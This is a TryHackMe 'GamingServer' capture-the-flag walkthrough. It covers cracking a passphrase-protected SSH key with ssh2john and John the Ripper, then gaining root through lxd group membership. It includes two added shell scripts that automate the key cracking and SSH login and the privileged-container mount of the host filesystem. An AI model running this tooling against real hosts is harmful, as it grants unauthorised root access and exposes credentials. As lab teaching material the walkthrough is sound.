TryHackMe - GamingServer Walkthrough
Vrijanandan Kumar
Cyber Security Enthusiast || CTF Player || Security Researcher || Passionate about Securing the Digital World || CEH
Network Enumeration
I started the network enumeration with a rustscan port scan to find open ports and the services running on them.
We have only two open ports: SSH on port 22 and the Apache HTTP server on port 80. Let's begin our enumeration by focusing on port 80.
Web Enumeration
When we visit the IP address in a web browser, the site displays placeholder lorem ipsum text. Let's check the page source.
The source gives us a potential username, john. Next we can run a gobuster scan to look for hidden files and directories.
The gobuster scan turns up quite a few files and directories. Let's check them one by one.
In the /secret directory we have a file named secretKey, which contains a private key. Since SSH is running on the target, this could be user john's private SSH key.
I tried logging in with it over SSH, but the key is passphrase protected, so we can't use it yet.
We also have an /uploads directory containing some interesting files.
One of them is a copy of "The Hacker Manifesto", which looks pretty neat!
We've also found a file named dict.lst, which appears to be a wordlist. Let's download it to our machine: we can use it to try to crack the passphrase on the private key.
User Shell
We can use John the Ripper to crack the passphrase on john's private key.
First we need to convert secretKey into a hash format John understands; ssh2john.py does this.
I'll save the output in hash.txt and then run John against it with the wordlist we found.
We've successfully recovered the passphrase for the private key. With it we can SSH into the target as john and read the user flag.
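As an added example (not code from the original walkthrough), the POSIX shell script below covers this cracking step together with the earlier observation that the key is passphrase protected. It first reads the key's header to tell which format and cipher protect it (a traditional PEM key announces encryption with Proc-Type/DEK-Info headers; a new-style OpenSSH key stores the cipher and KDF names right after its "openssh-key-v1" magic, and a bcrypt KDF means much slower cracking), then runs the ssh2john and john steps and logs in with the recovered passphrase. The ssh2john search paths, the output file hash.txt and the helper names are assumptions; the sample keys it builds are constructed for offline testing and are not real keys.

```shell
#!/bin/sh
# Added example: inspect, crack and use a recovered SSH private key.
# Assumes john (jumbo) is installed; the ssh2john paths below are common
# packaged locations, not values taken from the walkthrough.

# Print the raw bytes of an armored (BEGIN/END) key file.
key_body() { grep -v -- '-----' "$1" | tr -d '\n' | base64 -d; }

# Print the SSH "string" (4-byte big-endian length, then bytes) that starts at
# 1-based byte offset $2 of the decoded key file $1.
ssh_string_at() {
    hexlen=$(key_body "$1" | tail -c +"$2" | head -c 4 | od -An -v -tx1 | tr -d ' \n')
    key_body "$1" | tail -c +"$(($2 + 4))" | head -c "$((0x$hexlen))"
}

# Classify a private key: new-style OpenSSH keys carry cipher and KDF names
# after the 15-byte "openssh-key-v1\0" magic; PEM keys use Proc-Type/DEK-Info.
key_protection() {
    if grep -q 'BEGIN OPENSSH PRIVATE KEY' "$1"; then
        cipher=$(ssh_string_at "$1" 16)
        kdf=$(ssh_string_at "$1" "$((20 + ${#cipher}))")
        if [ "$cipher" = "none" ]; then echo "openssh-plain"; else echo "openssh-encrypted $cipher $kdf"; fi
    elif grep -q '^Proc-Type: 4,ENCRYPTED' "$1"; then
        echo "pem-encrypted $(sed -n 's/^DEK-Info: \([^,]*\),.*/\1/p' "$1")"
    else
        echo "plain"
    fi
}

# Locate ssh2john (assumed paths: Kali package, a source build, a bare binary).
find_ssh2john() {
    for p in /usr/share/john/ssh2john.py /opt/john/run/ssh2john.py /usr/bin/ssh2john; do
        [ -f "$p" ] && { echo "$p"; return 0; }
    done
    return 1
}

# Extract the passphrase from `john --show` output ("secretKey:passphrase").
# A passphrase containing ':' would be cut short by this pattern.
parse_john_show() { sed -n 's/^[^:]*:\([^:]*\).*/\1/p'; }

# Convert the key, crack it against the wordlist, print the passphrase.
crack_key() {   # $1=key file  $2=wordlist
    s2j=$(find_ssh2john) || { echo "ssh2john not found" >&2; return 1; }
    case $s2j in *.py) python3 "$s2j" "$1" ;; *) "$s2j" "$1" ;; esac > hash.txt
    john --wordlist="$2" hash.txt >/dev/null 2>&1
    john --show hash.txt | parse_john_show
}

# Log in with the key; the ssh client refuses a key readable by others, hence chmod 600.
ssh_with_key() { chmod 600 "$1"; ssh -i "$1" "$2@$3"; }   # key user host

# --- constructed samples (not real keys) for trying key_protection offline ---
# Encode $1 as an SSH string (names shorter than 256 bytes are enough here).
ssh_string() { printf '\000\000\000'; printf "\\$(printf '%03o' ${#1})"; printf '%s' "$1"; }

make_sample_openssh_key() {   # $1=file  $2=cipher name  $3=kdf name
    {
        echo '-----BEGIN OPENSSH PRIVATE KEY-----'
        { printf 'openssh-key-v1\000'; ssh_string "$2"; ssh_string "$3"; printf '\000\000\000\000'; } | base64
        echo '-----END OPENSSH PRIVATE KEY-----'
    } > "$1"
}

make_sample_pem_key() {   # $1=file  $2=DEK-Info cipher
    {
        echo '-----BEGIN RSA PRIVATE KEY-----'
        echo 'Proc-Type: 4,ENCRYPTED'
        echo "DEK-Info: $2,0123456789ABCDEF0123456789ABCDEF"
        echo ''
        echo 'AAAA'   # placeholder body, not real ciphertext
        echo '-----END RSA PRIVATE KEY-----'
    } > "$1"
}
```

Typical use on the attacking machine is `key_protection secretKey` to see what you are up against, `crack_key secretKey dict.lst` to get the passphrase, then `ssh_with_key secretKey john <target>`. Note that john caches cracked hashes in ~/.john/john.pot, so a second run reports "No password hashes left to crack" and you need `john --show` to see the result again.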
Root Shell
Now that we have a shell as user john, our next objective is to find a method to elevate our privileges to root.
Running the id command shows that john is a member of the lxd group.
id
LXD is a system container manager built on LXC for running Linux containers. Any member of the lxd group can talk to the LXD daemon, which runs as root, and can therefore create a privileged container with the host's filesystem mounted inside it. That gives root on the host whether or not the user has any sudo rights.
I found a guide on lxd privilege escalation. We need to build an Alpine image, import it on the target, and mount the target's root filesystem inside an LXD container (under /mnt/root), from where the host's /root is readable.
First we need to build the image in our own machine:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder && sudo ./build-alpine
This will create a .tar.gz compressed image similar to this:
Next we copy the compressed file to the target machine (scp with john's key works) and import it with lxc.
Our container has been created. Now we can simply start it and read the final flag under /mnt/root/root inside the container!
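The full sequence on the target, as an added example that is not the walkthrough's own code: it checks group membership, then imports the image, creates a privileged container, attaches the host's / as a disk device at /mnt/root, starts the container and reads the flag. The image alias "alpine", the container name "privesc" and the mount point are assumptions; the flag path /mnt/root/root/root.txt follows the walkthrough.

```shell
#!/bin/sh
# Added example: lxd group to root via a privileged container with the host
# root filesystem mounted. Assumes the alpine .tar.gz built with
# lxd-alpine-builder has been copied to the target and its path is passed as $1.

# Succeed when the group list (argument, or `id -nG` of the current user) contains lxd.
in_lxd_group() {
    groups="${1:-$(id -nG)}"
    for g in $groups; do
        [ "$g" = "lxd" ] && return 0
    done
    return 1
}

# Print the lxc commands for the escalation, one per line, for image tarball $1.
# security.privileged=true maps the container's root to the host's uid 0, so the
# mounted host files are really readable and writable instead of owned by "nobody".
lxd_privesc_cmds() {
    cat <<EOF
lxc image import $1 --alias alpine
lxc init alpine privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc -- /bin/sh -c 'cat /mnt/root/root/root.txt'
EOF
}

# Run the escalation for real (needs lxd group membership and the lxc client).
lxd_privesc() {
    in_lxd_group || { echo "current user is not in the lxd group" >&2; return 1; }
    command -v lxc >/dev/null || { echo "lxc client not found" >&2; return 1; }
    lxd_privesc_cmds "$1" | while IFS= read -r cmd; do
        echo "+ $cmd" >&2
        sh -c "$cmd" || exit 1
    done
}

# Only act when invoked with an image path, e.g. sh lxd_privesc.sh /tmp/alpine.tar.gz
[ $# -gt 0 ] && lxd_privesc "$1"
```

If `lxc init` fails with a message that no storage pool exists, run `lxd init` first and accept the defaults. Replacing the last command with `lxc exec privesc -- /bin/sh` gives an interactive root shell inside the container, with the whole host filesystem writable under /mnt/root.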